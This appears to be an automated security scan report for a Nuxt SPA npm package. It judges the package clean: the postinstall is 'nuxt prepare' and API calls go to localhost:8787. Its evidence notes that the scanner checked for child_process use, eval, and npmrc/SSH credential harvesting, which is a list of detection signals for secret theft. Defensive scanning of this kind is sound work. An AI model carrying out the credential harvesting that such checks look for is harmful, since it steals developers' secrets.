AI Security Review
scanned 4h ago · by lpm-firewall-aiNo confirmed malicious attack surface. The package is a Nuxt SPA layer with a normal Nuxt postinstall prepare hook and user/runtime API traffic to a configured backend.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install runs nuxt prepare; app runtime makes user-invoked backend requests
Impact
No source-grounded malicious install-time mutation, credential harvesting, or exfiltration identified
Mechanism
Nuxt layer setup and browser REST/WebSocket client
Rationale
Static inspection shows package-aligned Nuxt setup and runtime browser API functionality, with no concrete malicious chain. The scanner's lifecycle/network findings are explained by Nuxt prepare and the SPA's configured backend client.
Evidence
package.jsonnuxt.config.tsapp/composables/api/client.tsapp/composables/useApi.tsapp/composables/useWorkspaceStream.tsapp/stores/auth.tsapp/stores/personalSubscriptions.ts
Network endpoints1
localhost:8787
Decision evidence
public snapshotAI called this Clean at 92.0% confidence as Benign with low false-positive risk.
Evidence for block
- package.json defines postinstall: nuxt prepare.
- Runtime client sends bearer/password headers to configured apiBase and opens workspace WebSocket.
Evidence against
- package.json postinstall is standard Nuxt preparation; no custom install script or package file mutation found.
- nuxt.config.ts is a Nuxt layer config with default public apiBase http://localhost:8787.
- app/composables/api/client.ts and app/composables/useApi.ts target runtimeConfig.public.apiBase, not hardcoded exfiltration hosts.
- app/composables/useWorkspaceStream.ts opens WebSocket only to apiBase-derived workspace events after minting a ticket.
- rg found no child_process, filesystem writes, eval/vm/Function, npmrc/SSH harvesting, or agent control-surface mutation.
Behavioral surface
ChildProcessFilesystemNetworkWebSocket
UrlStrings
NoLicense
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = nuxt prepare
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = nuxt prepare
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgFindings
1 High2 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
LowScripts Present
LowFilesystem
LowUrl Strings
LowNo License